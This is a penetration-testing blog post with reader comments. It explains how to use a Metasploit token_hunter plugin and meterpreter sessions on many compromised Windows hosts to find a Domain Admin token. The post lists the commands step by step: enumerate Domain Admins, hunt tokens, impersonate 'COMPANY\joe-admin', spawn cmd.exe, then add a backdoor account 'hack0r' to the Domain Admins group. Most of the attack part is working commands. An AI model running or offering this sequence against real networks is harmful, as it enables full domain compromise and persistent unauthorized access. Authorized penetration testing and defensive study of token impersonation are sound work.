Hunting for Domain Admin Tokens

Penetration Assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code, really excels! Less time is wasted on mundane tasks. Automation is always key. Automating the tasks that should be automated. It is clear that there are specific tasks that can’t/shouldn’t be automated, but that is a topic for another post.

One nice example I have seen during several on-site assessments, is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can takes hours of manually work. I mentioned this to HD Moore he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.

Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
net groups "Domain Admins" /domain

Example of the file:

We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

To achieve Domain Admin privileges, we need to connect to a session that contained a Domain Admin token.
msf> sessions -i [session-with-domain-admin-token]

Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

Lastly, we add a new account to the domain and add the account into the Domain Admins group.
C:\net user hack0r h4ck0r) /add /domain
C:\net group "Domain Admins" hack0r /add /domain

Enjoy it and Pwn dem v0hns!


9 Responses to Hunting for Domain Admin Tokens

  1. Dr.White says:

    Nice =) thanks for tutorial…


  2. Black says:

    Good one there mate! (:

  3. acemutha says:

    Very useful tut even if nowadays I found very difficult to exploit windows machine as imo the last useful exploit is 08_067, that in most cases has been patched after the infamous conficker.

    • Jabra says:

      @acemutha There are plenty of exploits for Windows. Yesterday alone, Metasploit added 2 PDF exploits. You also use the most reliable exploits like psexec or blank sa.


  4. […] Hunting for Domain Admin Tokens By c0llateral Another one from Joshua’s blog […]

  5. xaocuc says:

    Nice post! You should definitely revise it due to last changes in meterpreter implementation

  6. *** says:

    ok first step net groups “Domain Admins” /domain
    Wouldn’t I need to execute this from a box joined to the domain? Do I also have to have domain admin privs to sucessfully execute it?

  7. media management software…

    […]Hunting for Domain Admin Tokens « Joshua "Jabra" Abraham[…]…

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: